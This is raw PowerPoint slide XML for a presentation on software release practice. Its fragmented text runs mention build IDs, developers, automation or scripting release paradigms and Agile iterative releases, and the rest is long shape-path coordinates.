            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484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45">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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softwa</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484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1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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>pro</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>du</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t  </a:t>
            </a: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ite</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="44484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30">
                <a:solidFill>
                  <a:srgbClr val="44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484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60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ion.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Con</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="44484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60">
                <a:solidFill>
                  <a:srgbClr val="44484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110">
                <a:solidFill>
                  <a:srgbClr val="44484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60">
                <a:solidFill>
                  <a:srgbClr val="44484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75">
                <a:solidFill>
                  <a:srgbClr val="44484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0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44484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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-90">
                <a:solidFill>
                  <a:srgbClr val="44484E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50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="44484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10">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>me</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="44484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9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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="44484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45">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rsio</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="44484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14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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ID,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-29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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Deve</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>loper</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="44484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60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ld</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ID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757172" y="3925823"/>
            <a:ext cx="3324225" cy="3322320"/>
            <a:chOff x="1757172" y="3925823"/>
            <a:chExt cx="3324225" cy="3322320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1757172" y="3925823"/>
              <a:ext cx="3324225" cy="3322320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3324225" h="3322320">
                  <a:moveTo>
                    <a:pt x="1661922" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1613778" y="683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1565974" y="2722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1518528" y="6097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1471458" y="10790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424783" y="16783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1378521" y="24056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1332691" y="32593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1287311" y="42373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1242400" y="53380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197976" y="65593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154057" y="78996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110663" y="93568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1067811" y="109292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1025520" y="126150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="983809" y="144123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942696" y="163192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="902199" y="183339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="862337" y="204546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="823129" y="226793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="784593" y="250063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="746747" y="274338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709610" y="299598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673200" y="325825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="637536" y="353000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602637" y="381106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568520" y="410124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="535205" y="440035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502709" y="470821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471052" y="502464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440251" y="534944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410326" y="568243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381294" y="602344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353175" y="637227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325986" y="672874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299746" y="709267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274474" y="746387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250188" y="784215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226906" y="822734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204648" y="861924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183431" y="901768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163274" y="942246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144195" y="983341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126214" y="1025033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109347" y="1067305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93615" y="1110138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79035" y="1153513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65626" y="1197412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53407" y="1241817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42395" y="1286708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32609" y="1332069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24069" y="1377879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16791" y="1424121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10795" y="1470776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6100" y="1517826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2723" y="1565252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683" y="1613036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1661160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683" y="1709283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2723" y="1757067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6100" y="1804493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10795" y="1851543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16791" y="1898198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24069" y="1944440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32609" y="1990250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42395" y="2035611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53407" y="2080502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65626" y="2124907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79035" y="2168806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93615" y="2212181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109347" y="2255014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126214" y="2297286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144195" y="2338978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163274" y="2380073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183431" y="2420551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204648" y="2460395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226906" y="2499585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250188" y="2538104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274474" y="2575932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299746" y="2613052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325986" y="2649445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353175" y="2685092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381294" y="2719975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410326" y="2754076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440251" y="2787375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471052" y="2819855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502709" y="2851498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="535205" y="2882284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568520" y="2912195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602637" y="2941213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="637536" y="2969319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673200" y="2996494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709610" y="3022721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="746747" y="3047981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="784593" y="3072256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="823129" y="3095526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="862337" y="3117773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="902199" y="3138980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942696" y="3159127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="983809" y="3178196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1025520" y="3196169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1067811" y="3213027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110663" y="3228751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1154057" y="3243323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1197976" y="3256726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1242400" y="3268939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1287311" y="3279946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1332691" y="3289726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1378521" y="3298263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424783" y="3305536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1471458" y="3311529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1518528" y="3316222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1565974" y="3319597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613778" y="3321636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1661922" y="3322320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710065" y="3321636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1757869" y="3319597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805315" y="3316222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852385" y="3311529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1899060" y="3305536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1945322" y="3298263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1991152" y="3289726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2036532" y="3279946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2081443" y="3268939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2125867" y="3256726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169786" y="3243323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213180" y="3228751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2256032" y="3213027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2298323" y="3196169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2340034" y="3178196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2381147" y="3159127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2421644" y="3138980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2461506" y="3117773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2500714" y="3095526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2539250" y="3072256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577096" y="3047981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614233" y="3022721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2650643" y="2996494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2686307" y="2969319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721206" y="2941213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2755323" y="2912195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2788638" y="2882284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2821134" y="2851498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2852791" y="2819855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2883592" y="2787375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2913517" y="2754076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2942549" y="2719975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2970668" y="2685092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997857" y="2649445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3024097" y="2613052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049369" y="2575932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3073655" y="2538104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3096937" y="2499585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3119195" y="2460395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3140412" y="2420551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160569" y="2380073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3179648" y="2338978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3197629" y="2297286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3214496" y="2255014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3230228" y="2212181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3244808" y="2168806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3258217" y="2124907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270436" y="2080502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281448" y="2035611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291234" y="1990250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3299774" y="1944440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3307052" y="1898198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3313048" y="1851543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317743" y="1804493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321120" y="1757067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3323160" y="1709283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3323843" y="1661160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3323160" y="1613036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3321120" y="1565252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317743" y="1517826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3313048" y="1470776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3307052" y="1424121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3299774" y="1377879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291234" y="1332069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281448" y="1286708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270436" y="1241817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3258217" y="1197412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3244808" y="1153513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3230228" y="1110138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3214496" y="1067305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3197629" y="1025033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3179648" y="983341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160569" y="942246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3140412" y="901768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3119195" y="861924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3096937" y="822734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3073655" y="784215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049369" y="746387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3024097" y="709267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2997857" y="672874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2970668" y="637227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2942549" y="602344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2913517" y="568243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2883592" y="534944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2852791" y="502464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2821134" y="470821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2788638" y="440035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2755323" y="410124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721206" y="381106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2686307" y="353000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2650643" y="325825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614233" y="299598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577096" y="274338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2539250" y="250063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2500714" y="226793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2461506" y="204546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2421644" y="183339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2381147" y="163192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2340034" y="144123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2298323" y="126150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2256032" y="109292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2213180" y="93568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169786" y="78996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2125867" y="65593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2081443" y="53380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2036532" y="42373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1991152" y="32593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1945322" y="24056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1899060" y="16783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1852385" y="10790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805315" y="6097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1757869" y="2722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710065" y="683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1661922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2427" y="4974335"/>
              <a:ext cx="1513331" cy="15118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69740" y="306451"/>
            <a:ext cx="77139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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Automation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-8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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Paradigms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39439" y="760476"/>
            <a:ext cx="10116312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568955" y="1933193"/>
            <a:ext cx="1152461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Following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iterative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processes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used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by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Agile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paradigm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release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well-tested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code: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22653" y="5275326"/>
            <a:ext cx="4338955" cy="2056130"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4338955" h="2056129">
                <a:moveTo>
                  <a:pt x="0" y="342646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3128" y="296152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12240" y="251559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26927" y="209276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46783" y="169709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71397" y="133268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100361" y="100361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133268" y="71397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169709" y="46783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209276" y="26927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251559" y="12240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296152" y="3128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342646" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3996182" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4042675" y="3128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4087268" y="12240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4129551" y="26927"/>
                </a:lnTo>
                <a:lnTo>
